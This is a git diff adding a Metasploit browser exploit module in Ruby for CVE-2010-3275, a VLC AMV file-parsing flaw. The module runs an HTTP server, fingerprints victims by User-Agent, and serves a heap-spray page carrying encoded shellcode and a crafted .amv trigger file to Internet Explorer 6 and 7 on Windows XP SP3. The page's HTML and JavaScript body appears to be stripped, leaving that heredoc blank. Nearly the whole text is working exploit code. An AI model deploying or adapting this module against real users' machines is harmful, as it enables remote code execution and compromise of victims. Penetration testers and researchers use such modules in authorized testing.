diff --git a/modules/exploits/windows/browser/vlc_amv.rb b/modules/exploits/windows/browser/vlc_amv.rb
new file mode 100644
index 0000000000..82783df558
--- /dev/null
+++ b/modules/exploits/windows/browser/vlc_amv.rb
@@ -0,0 +1,168 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::HttpServer::HTML
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "VLC AMV Vulnerability",
+ 'Description' => %q{
+ This module exploits VLC media player when handling a .AMV file. By flipping the 0x41st
+ byte in the file format, VLC crashes due to an invalid pointer, which allows remote
+ attackers to gain arbitrary code execution.
+
+ The vulnerable packages include:
+ VLC 1.1.4
+ VLC 1.1.5
+ VLC 1.1.6
+ VLC 1.1.7
+ },
+ 'License' => MSF_LICENSE,
+ 'Version' => "$Revision$",
+ 'Author' =>
+ [
+ 'sinn3r',
+ ],
+ 'References' =>
+ [
+ ['CVE', 'CVE-2010-3275'],
+ ['URL', 'http://www.coresecurity.com/content/vlc-vulnerabilities-amv-nsv-files'],
+ ],
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00",
+ 'space' => 1000,
+ 'StackAdjustment' => -3500,
+ },
+ 'DefaultOptions' =>
+ {
+ 'ExitFunction' => "process",
+ 'InitialAutoRunScript' => 'migrate -f',
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'Automatic', {} ],
+ [ 'Windows XP SP3 IE6', {'Ret'=>0x0c0c0c0c} ],
+ [ 'Windows XP SP3 IE7', {'Ret'=>0x1c1c1c1c} ],
+ ],
+ 'DisclosureDate' => "Mar 23 2011",
+ 'DefaultTarget' => 0))
+
+ end
+
+ def get_trigger_file
+ path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2010-3275.amv")
+ f = File.open(path, "rb")
+ data = f.read
+ f.close
+ return data
+ end
+
+ def getRet(cli, request)
+
+ if target.name == 'Automatic'
+
+ agent = request.headers['User-Agent']
+
+ case agent
+ when /MSIE 6\.0/
+ return [0x0c0c0c0c].pack('V') * 8
+ when /MSIE 7\.0/
+ return [0x1c1c1c1c].pack('V') * 8
+ when /^vlc/
+ #VLC identifies itself as "VLC" when requesting our trigger file
+ return ""
+ when /^NSPlayer/
+ #NSPlayer is also used while requesting the trigger file
+ return ""
+ else
+ return nil
+ end
+
+ else
+
+ #User manually specified a target
+ return [target.ret].pack('V') * 8
+
+ end
+
+ end
+
+ def on_request_uri(cli, request)
+
+ #Determine if client is a potential victim either manually or automatically,
+ #and then return the appropriate EIP
+ nops = getRet(cli, request)
+ if nops == nil
+ send_not_found(cli)
+ return
+ end
+
+ if request.uri.match(/\.amv/)
+ amv = get_trigger_file
+ print_status("Sending trigger file to #{cli.peerhost}:#{cli.peerport}")
+ send_response(cli, amv, { 'Content-Type' => 'text/plain' } )
+ return
+ end
+
+ nopsled = Rex::Text.to_unescape(nops, Rex::Arch.endian(target.arch))
+ shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
+
+ js_func_name = rand_text_alpha(rand(6) + 3)
+ js_var_blocks_name = rand_text_alpha(rand(6) + 3)
+ js_var_shell_name = rand_text_alpha(rand(6) + 3)
+ js_var_nopsled_name = rand_text_alpha(rand(6) + 3)
+ js_var_index_name = rand_text_alpha(rand(6) + 3)
+ trigger_file = datastore['URIPATH'] + "/" + rand_text_alpha(rand(6) + 3) + ".amv"
+
+ html = <<-EOS
+
+
+
+
+
+
+
+
+ EOS
+
+ #Remove extra tabs in HTML
+ html = html.gsub(/^\t\t/, "")
+
+ print_status("Sending malicious page to #{cli.peerhost}:#{cli.peerport}...")
+ send_response( cli, html, {'Content-Type' => 'text/html'} )
+ end
+end
\ No newline at end of file